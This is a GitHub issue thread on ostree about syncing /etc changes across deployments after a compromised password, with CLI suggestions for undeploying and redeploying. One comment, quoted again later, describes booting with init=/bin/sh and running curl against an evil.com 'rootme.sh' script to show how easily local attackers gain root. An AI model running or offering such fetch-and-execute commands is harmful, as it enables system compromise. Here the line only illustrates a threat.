### ISSUE TITLE
Allow re-running /etc merge

### ISSUE THREAD

**Issue by dbnicholson** [ostreedev/ostree#2271]
Currently the /etc merge happens once per deployment when it's finalized. That means any old deployments won't pick up /etc changes. I think that's the right thing to do in normal operation, but it would be nice if you could run it again if needed. If you need to boot an old deployment for any reason, it wouldn't have any changes that were made in /etc since the last time it was run. Essentially, this makes the rollback feature of ostree have drawbacks.

**Comment by dbnicholson** [comment]
A simple way to do this would be to just finalize the deployment on demand while temporarily making it mutable.

**Comment by dbnicholson** [comment]
A more directed `ostree admin config-merge` could be nice. I could even see that being useful on the booted deployment to clean up a mess in /etc.

**Comment by dbnicholson** [comment]
Wait, this wouldn't do what I'm suggesting. Running the /etc merge again won't sync local changes across deployments. Basically what you want to do is `rsync -a /ostree/deploy/$os/deploy/{$current,$old}/etc/`. I guess that would be more of an `ostree admin config-sync` kind of operation.

The actual use case that came up is that a password in /etc got compromised. It got rotated in the current deployment but would still be compromised in an old deployment. Ultimately the old deployment was just deleted, but it would be nice if there was a clean way to say "copy /etc or some subset of it from the booted deployment to some other deployment".

**Comment by cgwalters** [comment]
The cleaner way to do this today is to remove the rollback deployment (and if you still want it, re-add it but at a lower priority in the bootloader).  On the CLI this combination is like:

```
$ ostree admin undeploy 1
$ ostree admin deploy <rollback commit> --not-as-default
```

(The CLI is unergonomic here of course but that's the idea)

**Comment by cgwalters** [comment]
At a much broader level though protecting against local attackers is *hard* - particularly for PCs.  It only takes e.g. 30s to change the kernel arguments to use `init=/bin/sh` bring up the network and `curl https://evil.com/rootme.sh`.

**Comment by dbnicholson** [comment]
> The cleaner way to do this today is to remove the rollback deployment (and if you still want it, re-add it but at a lower priority in the bootloader). On the CLI this combination is like:
> 
> ```
> $ ostree admin undeploy 1
> $ ostree admin deploy <rollback commit> --not-as-default
> ```
> 
> (The CLI is unergonomic here of course but that's the idea)

Good point. Maybe that's the only real issue to pursue - make the interface a little nicer. Some quick thoughts:

* It would be nice if `undeploy` could be made to delete all but the booted deployment
* If you `deploy` by commit, then you also need to specify the origin file or you won't have an upgrade refspec. Would be nice if it had a `--ref` option or something that would handle this case. Or the opposite - specify the refspec like now but provide a `--commit` option rather than resolving the refspec.

**Comment by jprvita** [comment]
> At a much broader level though protecting against local attackers is _hard_ - particularly for PCs. It only takes e.g. 30s to change the kernel arguments to use `init=/bin/sh` bring up the network and `curl https://evil.com/rootme.sh`.

Absolutely. However, there are ways to make it harder (GRUB / BIOS passwords), and it is a real-world requirement in certain deployments like schools, libraries etc.
